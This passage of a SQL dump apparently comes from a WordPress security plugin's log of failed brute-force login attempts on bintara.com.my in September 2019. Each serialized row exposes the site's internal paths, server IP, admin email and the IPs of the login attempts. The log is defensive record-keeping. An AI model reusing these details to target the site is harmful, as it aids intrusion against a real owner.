18:37:23',18260464,19555176,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.233.82'),(24220,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"54192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-WsWShanGhHYaqyCSoHQAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659121.4911\";s:12:\"REQUEST_TIME\";s:10:\"1568659121\";}}','notice','2019-09-16 18:38:43','2019-09-16 18:38:41',17747960,19234384,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(24221,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"54192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-WsWShanGhHYaqyCSoHQAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659121.4911\";s:12:\"REQUEST_TIME\";s:10:\"1568659121\";}}','notice','2019-09-16 18:38:43','2019-09-16 18:38:41',17910912,19234384,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(24222,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.161.22\";s:11:\"REMOTE_PORT\";s:5:\"55162\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-YW2ShanGhHYaqyCSozgAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659547.2374\";s:12:\"REQUEST_TIME\";s:10:\"1568659547\";}}','notice','2019-09-16 18:45:48','2019-09-16 18:45:47',17742256,19232120,'https://bintara.com.my/wp-login.php',1,0,'144.217.161.22'),(24223,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.161.22\";s:11:\"REMOTE_PORT\";s:5:\"57708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-YXmShanGhHYaqyCSo0QAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659550.6972\";s:12:\"REQUEST_TIME\";s:10:\"1568659550\";}}','notice','2019-09-16 18:45:52','2019-09-16 18:45:51',18258992,19555904,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.161.22'),(24224,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"60438\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ZbWShanGhHYaqyCSpQwAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659821.6736\";s:12:\"REQUEST_TIME\";s:10:\"1568659821\";}}','notice','2019-09-16 18:50:22','2019-09-16 18:50:22',17741904,19232808,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(24225,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"60854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ZcGkPXSyJlCUJQmofXQAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659824.3196\";s:12:\"REQUEST_TIME\";s:10:\"1568659824\";}}','notice','2019-09-16 18:50:26','2019-09-16 18:50:24',18258400,19556840,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(24226,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"48628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-aEtK-omY048@iBsMROgAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568659986.94\";s:12:\"REQUEST_TIME\";s:10:\"1568659986\";}}','notice','2019-09-16 18:53:08','2019-09-16 18:53:07',17748032,19234088,'https://bintara.com.my/wp-login.php',1,0,'82.202.249.38'),(24227,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"48628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-aEtK-omY048@iBsMROgAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568659986.94\";s:12:\"REQUEST_TIME\";s:10:\"1568659986\";}}','notice','2019-09-16 18:53:09','2019-09-16 18:53:07',17911024,19234088,'https://bintara.com.my/wp-login.php',1,0,'82.202.249.38'),(24228,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"49458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-aFmkPXSyJlCUJQmofcgAAAYg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568659990.117\";s:12:\"REQUEST_TIME\";s:10:\"1568659990\";}}','notice','2019-09-16 18:53:11','2019-09-16 